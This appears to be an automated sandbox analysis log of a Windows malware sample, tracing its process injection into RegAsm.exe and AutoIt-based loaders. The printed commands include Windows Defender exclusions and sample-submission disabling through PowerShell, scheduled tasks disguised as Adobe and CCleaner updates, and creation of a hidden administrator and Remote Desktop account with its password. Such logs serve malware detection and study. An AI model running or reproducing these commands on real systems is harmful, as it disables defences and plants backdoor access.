              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: B90000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: 580000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: 61A000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: D00000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: A8C000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: B90000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: 9D5000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C91A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,7_2_00C91A7B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C3331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,7_2_00C3331E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9BA4A SendInput,keybd_event,7_2_00C9BA4A
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C9EB90 mouse_event,7_2_00C9EB90
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeProcess created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\System32\makecab.exe" Jump to behavior
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiffJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com Rifiutare.exe.com DJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com Uno.exe.com fJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com Inebriato.exe.com RJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comProcess created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user fsUIwEqMAc zyTFxcsIkA /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net accounts /maxpwage:unlimited
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add
              Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 accounts /maxpwage:unlimited
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cscript.exe "c:\users\user\appdata\roaming\uenuq\54.vbs" fsuiweqmac zytfxcsika "c:\users\user\appdata\roaming\uenuq\578.vbs" "c:\users\user\appdata\roaming\uenuq\baccrsah.bat" "c:\users\user\appdata\roaming\uenuq\rbv.dll"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cscript.exe "c:\users\user\appdata\roaming\uenuq\54.vbs" fsuiweqmac zytfxcsika "c:\users\user\appdata\roaming\uenuq\578.vbs" "c:\users\user\appdata\roaming\uenuq\baccrsah.bat" "c:\users\user\appdata\roaming\uenuq\rbv.dll"
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C913DC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,7_2_00C913DC
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00403FF2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00403FF2
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BCE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000000.1703776630.0000000000CF3000.00000002.00000001.01000000.00000006.sdmp, Rifiutare.exe.com, 00000009.00000000.1706269043.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: Rifiutare.exe.com, Uno.exe.com, Inebriato.exe.comBinary or memory string: Shell_TrayWnd
              Source: RegAsm.exe, 00000014.00000002.2259856509.0000000000D00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: 0@`No errorInvalid argument%s.%08x\/0123456789ABCDEFNotification AreaShell_TrayWndTrayNotifyWndSysPager0123456789abcdefgenericunknown erroriostreamiostream stream errorsystemwusa.exe/quiet Google Chromeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid code lengths setinvalid bit length repeatinvalid code -- missing end-of-blockinvalid literal/lengths setinvalid distances setinvalid literal/length codeinvalid distance codeinvalid distance too far backincorrect header checkunknown compression methodinvalid window sizeunknown header flags setheader crc mismatchincorrect data checkincorrect length checkneed dictionarystream endfile errorstream errordata errorinsufficient memorybuffer errorincompatible version
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C50AB8 cpuid 7_2_00C50AB8
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00403DC8
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
